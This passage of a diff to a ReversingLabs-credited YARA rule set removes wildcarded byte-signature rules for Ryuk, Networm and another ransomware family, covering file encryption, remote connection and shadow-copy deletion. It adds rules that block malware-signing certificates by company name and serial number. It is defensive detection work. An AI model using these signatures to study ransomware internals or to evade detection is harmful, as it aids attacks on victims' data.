-            ?? 8B 08 50 FF 51 ?? 8B 45 ?? 50 8B 08 FF 51 ?? FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 00 68 ?? ?? ?? ?? 8B 40 ?? 89 45 ?? E8 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 30 85 F6 74 ?? 8B 36 EB ?? 33 F6 68 ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33 C0 8D 4D ?? 51 6A ?? 6A
-            ?? 56 50 FF 75 ?? FF 55 ?? 8B 75 ?? 89 45 ?? 85 F6 74 ?? 8B CF F0 0F C1 4E ?? 49 75
-            ?? 85 F6 74 ?? 8B 06 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 85
-            C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83
-        }
-		$delete_shadow_copies_p3 = {
-            C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 85 F6 74 ?? F0 0F C1 7E ??
-            4F 75 ?? 85 F6 74 ?? 8B 06 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8B 46
-            ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 83 7D ?? ?? 7D ?? 8B 45 ?? 50 8B 08 FF 51 ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B
-            4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8D 55 ?? 52 8D 55
-            ?? 52 6A ?? 6A ?? 51 FF 50 ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? 6A ?? 6A ?? 52 8B
-            01 6A ?? 68 ?? ?? ?? ?? 51 FF 50 ?? 85 C0 78 ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? FF 75 ??
-            8B 01 51 FF 50 ?? 85 C0 78 ?? FF 75 ?? 68 ?? ?? ?? ?? EB ?? 50 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 FF D3 8B 45 ?? 50 8B 08 FF 51 ?? 8B 4D ?? 85 C9 75 ??
-            8B 4D ?? 85 C9 74 ?? 8B 01 51 FF 50 ?? 8B 45 ?? 50 8B 08 FF 51 ?? 8B 45 ?? 50 8B 08
-            FF 51 ?? 8B 45 ?? 8B 08 50 FF 51 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 4D ?? 64 89
-            0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PAPER AND CORE SUPPLIES LTD" and pe.signatures [ i ] . serial == "45:24:5e:ef:53:fc:f3:81:69:c7:15:cf:68:f4:44:52" and 1639958400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_1895433Ee9E2Bd48619D75132262616F : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "d7bf59df-708c-5260-bc98-1a86b2c9c988"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11328-L11344"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f00a29ff5dddae40225ab62cb2d4b9dec1539ad58c8cd27d686480eecdb3e31d"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $write_console_log_p* ) ) and ( all of ( $get_system_information_p* ) ) and ( all of ( $everything_library_setup_p* ) ) and ( all of ( $delete_shadow_copies_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Evetrans Ltd" and pe.signatures [ i ] . serial == "18:95:43:3e:e9:e2:bd:48:61:9d:75:13:22:62:61:6f" and 1619789516 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Networm : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1Ffc9825644Caf5B1F521780C5C7F42C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Networm ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3b17b97d-c882-5f65-8b89-847e2300873c"
-		date = "2021-07-05"
-		modified = "2021-07-05"
+		id = "3d806d90-e029-5521-b191-6967e2691c0f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Networm.yara#L1-L103"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ff9bcb9868522f9d4abf2ab9f94d5b7c9b009e5c6d0cf832c7d052f18e048b31"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11346-L11362"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1a9263c809f5633d01d4d4d0091c8dc214bad73af0eff3c9a94b33bca513f26d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Networm"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? 8B 7D ?? 33 DB
-            6A ?? 59 33 C0 89 5D ?? 89 4D ?? 66 89 45 ?? 89 5D ?? 89 5D ?? 89 4D ?? 66 89 45 ??
-            68 ?? ?? ?? ?? 8B D7 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 4D ?? 3B C8
-            74 ?? 88 9D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ??
-            8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D
-            ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? F6 85
-            ?? ?? ?? ?? ?? 8D 45 ?? 74 ?? 6A ?? 50 8B CE E8 ?? ?? ?? ?? 8B F0 85 F6 0F 85 ?? ??
-            ?? ?? 8B B5 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 FF 15 ?? ??
-            ?? ?? 85 C0 74 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 8B 1D ?? ?? ?? ?? FF D3 8B F0 83 FE ?? 75 ?? 83 7F ?? ?? 8B C7 72 ?? 8B 07 68
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 7F ?? ?? 72 ?? 8B 3F 57 FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? FF D3 8B F0 EB ?? FF 15 ?? ?? ?? ?? EB ?? 33 F6 8D 4D ?? E8 ?? ??
-            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? C2
-        }
-		$remote_connection_p1 = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 57 6A ?? 8B FA 8B F1
-            FF 15 ?? ?? ?? ?? 33 C0 50 50 89 45 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 57 56
-            FF 15 ?? ?? ?? ?? 8B D3 8B C8 E8 ?? ?? ?? ?? 83 3B ?? 8B F0 75 ?? 68 ?? ?? ?? ?? EB
-            ?? 81 3B ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? EB ?? 81 3B ?? ?? ??
-            ?? 74 ?? 81 3B ?? ?? ?? ?? 74 ?? 85 F6 74 ?? 83 C8 ?? EB ?? 83 65 ?? ?? 8D 75 ?? 8B
-            45 ?? 8B FB C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? A5 A5 A5 8B 4D ?? 5F 5E 33 CD 5B E8 ??
-            ?? ?? ?? C9 C3
-        }
-		$remote_connection_p2 = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 57 6A ?? 8B FA 8B F1
-            FF 15 ?? ?? ?? ?? 33 C0 50 50 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ??
-            ?? 8B D3 8B C8 E8 ?? ?? ?? ?? 83 3B ?? 8B F0 75 ?? 68 ?? ?? ?? ?? EB ?? 81 3B ?? ??
-            ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 85 F6 74 ?? 83 C8 ?? EB ?? 83 65 ??
-            ?? 8D 75 ?? 8B 45 ?? 8B FB C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? A5 A5 A5 8B 4D ?? 5F 5E
-            33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
-            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 8B 45 ?? 83 F8 ?? C7 45 ?? ?? ?? ?? ?? 0F
-            94 C7 83 F8 ?? 0F 94 C3 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 0F B6 C3 83 F0 ?? 8D 04
-            45 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 6A ?? FF 76 ?? FF 15 ?? ?? ?? ?? 8B C8 89 4E ??
-            85 C9 0F 84 ?? ?? ?? ?? 84 FF 74 ?? BF ?? ?? ?? ?? EB ?? 0F B6 C3 8D 3C 45 ?? ?? ??
-            ?? 8B 56 ?? 8B 46 ?? 85 D2 7C ?? 0F 8F ?? ?? ?? ?? 85 C0 72 ?? 85 D2 7C ?? 0F 8F ??
-            ?? ?? ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 55 ?? EB ?? 0F 57 C0 66 0F 13
-            45 ?? 8B 45 ?? FF 75 ?? 50 FF 75 ?? FF 75 ?? 57 51 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D
-            4D ?? 89 46 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ??
-            59 5F 5E 5B 8B E5 5D C2
-        }
-		$encrypt_files_p2 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 56 A1 ?? ?? ?? ?? 33 C5
-            50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ??
-            ?? 8B 4D ?? 85 C9 74 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 45 ?? 85 C0 74 ?? 0F
-            8E ?? ?? ?? ?? 83 F8 ?? 7E ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? EB ?? F6 C1 ?? C7 45 ?? ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 0F 95 C0 40 89 45 ?? 83 7D ?? ?? 7F ?? 0F 8C ?? ?? ?? ?? 83
-            7D ?? ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 7F ?? 0F 8C ?? ?? ?? ?? 83 7D ?? ?? 0F 82 ??
-            ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 8D 45 ?? 8B
-            CE 50 E8 ?? ?? ?? ?? 8D 45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B E5 5D C2 ?? ?? 8D 45 ?? 6A
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ??
-            ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45
-            ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6
-            45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIVUS LIMITED" and pe.signatures [ i ] . serial == "1f:fc:98:25:64:4c:af:5b:1f:52:17:80:c5:c7:f4:2c" and 1615507200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_8D52Fb12A2511E86Bbb0Ba75C517Eab0 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "1bc9d36c-381e-5359-bba4-8dd870ed9267"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11364-L11382"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "023830ab3d71ed8ecf8f0e271c56dc267dcd000f5ff156c70d31089cd7010da8"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VThink Software Consulting Inc." and ( pe.signatures [ i ] . serial == "00:8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" or pe.signatures [ i ] . serial == "8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" ) and 1599177600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ryuk : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_332Bd5801E8415585E72C87E0E2Ec71D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ryuk ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "179c9277-0bdc-522a-a822-cf93febff408"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "d251afda-7582-5a00-a100-fd3acff2f995"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Ryuk.yara#L1-L199"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bf93892b281be20917656e242cbb0f3b3694439556b7e5e40a424ba1aa909105"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11384-L11400"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3648c3a8dbcdbd24746b9fa8cb3071d5f5019e5917848d88437158c6cb165445"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ryuk"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
-            6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 55 ?? 52
-            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ??
-            ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 0F 57 C0 66 0F 13
-            45 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 52 8B 45
-            ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 83 7D ?? ?? 77 ?? 81 7D
-            ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ??
-            6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ??
-            89 55 ?? 83 7D ?? ?? 72 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 6A ?? 6A ?? 8B 4D ?? 51
-            8B 55 ?? 52 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52
-            50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 77
-            ?? 83 7D ?? ?? 77 ?? 72 ?? 83 7D ?? ?? 73 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 83 7D ?? ?? 77 ?? 72
-            ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 6A
-            ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? 89
-            55 ?? EB ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 6A ?? 6A ?? 8B 55 ??
-            52 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D
-        }
-		$encrypt_files_p2 = {
-            77 ?? 83 7D ?? ?? 77 ?? 72 ?? 83 7D ?? ?? 77 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8B 4D ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 72 ??
-            83 7D ?? ?? 73 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D
-            ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F
-            86 ?? ?? ?? ?? 8B 4D ?? 81 E9 ?? ?? ?? ?? 89 4D ?? 6A ?? 6A ?? 8B 55 ?? 52 8B 45 ??
-            50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ??
-            89 45 ?? 83 7D ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ??
-            8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 0F 83 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ??
-            ?? 8B 45 ?? 0F BE 8C 05 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 0F BE 84 15
-            ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 0F BE 94 0D ?? ?? ?? ?? 83 FA ?? 0F
-            85 ?? ?? ?? ?? 8B 45 ?? 0F BE 8C 05 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 ??
-            0F BE 84 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 0F BE 94 0D ?? ?? ?? ??
-            83 FA ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 8D ??
-            ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 66 A1 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ??
-            ?? ?? ?? ?? 75 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 55 ?? 52 8B 45 ??
-            50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9
-        }
-		$encrypt_files_p3 = {
-            6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
-            ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D
-            ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 6A ?? 6A ?? 6A
-            ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 50 8B 45 ?? 50 FF 15 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B
-            55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ??
-            8D 45 ?? 50 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ??
-            51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 6A ??
-            68 ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 68
-        }
-		$encrypt_files_p4 = {
-            8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 0F 87 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 75 ?? 8B 4D ?? 89 4D ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 69 55 ?? ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ??
-            ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B
-            4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
